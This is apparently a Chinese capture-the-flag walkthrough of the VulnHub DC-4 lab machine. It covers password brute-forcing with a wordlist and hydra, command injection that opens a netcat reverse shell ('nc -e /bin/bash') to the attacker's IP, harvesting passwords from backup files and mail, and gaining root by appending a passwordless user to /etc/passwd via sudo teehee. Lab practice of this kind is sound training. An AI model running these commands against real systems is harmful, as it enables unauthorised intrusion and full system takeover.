一.靶机下载
官方链接:
https://download.vulnhub.com/dc/DC-4.zip
网盘链接:
https://pan.baidu.com/s/1fpD8PAIJvU-Sqrbj37II4g 提取码: rkp6
导入之后要在设置中将其调为NAT模式
默认情况我们是不知道靶机的密码的,目的是通过kali获取靶机中的flag信息
二.靶机信息收集
因为靶机与kali处于同一网络状态下,使用命令:arp-scan -l得到靶机的ip为:192.168.194.136
使用命令:nmap -A 192.168.194.136对靶机进行扫描
发现靶机开放了80端口,尝试对80端口进行访问
正常输入账号密码之后也没有回显用户是否存在,所以就先爆破admin用户的密码试试
三.爆破
用yakit或者bp都可以,爆破一下admin的密码,使用字典为top10000
成功爆破出密码为happy,尝试进行登录
简单尝试发现可以进行命令执行,抓包进行测试是否可以修改命令
四.抓包命令执行
使用命令:id
可以发现触发了命令执行,但是用户的权限还是比较低的,所以尝试去反弹shell然后进行提权
使用命令:
nc -lvvp 1111
nc+-e+/bin/bash+192.168.194.134+1111
获取交互式shell
使用命令:
python -c "import pty; pty.spawn('/bin/bash');"
五.提权
查看系统的版本号,在msf中查找是否有对应版本号的漏洞利用
使用命令:cat /proc/version
cat /etc/issue
使用命令:
searchsploit "4.9.30" Debian
并没有找到对应内核的提权漏洞,换个思路
使用命令:cat /etc/passwd
根据uid1001-1003可以知道charles,jim,sam是系统的普通用户
逐个查看charles,jim,sam的目录,charles和sam目录并没有发现什么,jim目录却发现了一个备份文件存在
使用命令:
ls -l /home/jim
使用命令:
cd /home/jim
ls backups
cat backups/old-passwords.bak
将这里密码全都复制出来然后创建一个叫password.txt 的文件,然后去爆破jim用户的ssh密码
使用命令:
hydra -l jim -P password.txt ssh://192.168.194.136
成功爆破出密码是jibril04,接着使用jim账号登录ssh
使用命令:
ssh jim@192.168.194.136
一个一个查看之后发现mbox里面存在可利用信息
这说明jim用户是有查看邮件的权限的
使用命令:
cd var/mail
ls
cat jim
发现了charles的密码是^xHhA&hvim0y
使用该密码切换到charles用户
使用命令:
su charles
使用命令:
sudo -l
可以具有/usr/bin/teehee,这个命令可以让我们新增一个超级管理员用户
使用命令:
echo "test::0:0::root:/bin/bash" | sudo teehee -a /etc/passwd
cd /root
ls
cat flag.txt
成功获取最后的flag!
如有错误请大佬们指正!
到这里我们也是成功通关了DC4靶机,后续会接着更新DC系列的靶机通关教程,请多多关注一下!